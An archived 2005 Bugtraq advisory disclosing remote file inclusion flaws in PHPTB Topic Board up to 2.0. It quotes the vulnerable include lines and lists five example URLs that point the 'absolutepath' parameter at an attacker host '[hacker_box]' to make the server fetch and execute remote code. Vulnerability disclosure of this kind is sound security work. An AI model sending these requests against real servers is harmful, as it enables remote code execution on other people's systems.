PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities
From: goszynskif@xxxxxxxxx
Date: 17 Aug 2005 10:14:39 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: PHPTB Topic Board - Multiple PHP injection
                             vulnerabilities
   Version <= 2.0
   Homepage: htt://www.phptb.com/

   Author: Filip Groszyñski (VXSfx)
   Date: 17 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

     PHPTB Topic Borad is an open source portal system. 
     However, an input validation flaw can cause malicious
     attackers to remote code execution on the web server.

   --------------------------------------------------------
   
   Vulnerable code exist in ./classes/admin_o.php,
                            ./classes/board_o.php,
                            ./classes/dev_o.php,
                            ./classes/file_o.php and
                            ./classes/tech_o.php:
  <?php
        include $absolutepath.'classes/smart_o.php';
   ... EOF

   Over that I found vulnerable code in ./classes/dev_o.php and
                                        ./classes/tech_o.php:

   ...
        require $GLOBALS['absolutepath'].'userpass.php';
   ... EOF
  
   --------------------------------------------------------

   Examples:

       
http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/
       
http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/
       
http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/
       
http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif gmail com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

Prev by Date: [SECURITY] [DSA 777-1] New Mozilla packages fix frame injection spoofing vulnerability
Next by Date: Unicode Buffer Overflow in WinFtp Server 1.6.8
Previous by thread: Re: [SECURITY] [DSA 777-1] New Mozilla packages fix frame injection spoofing vulnerability
Next by thread: Unicode Buffer Overflow in WinFtp Server 1.6.8
Index(es):
- Date
- Thread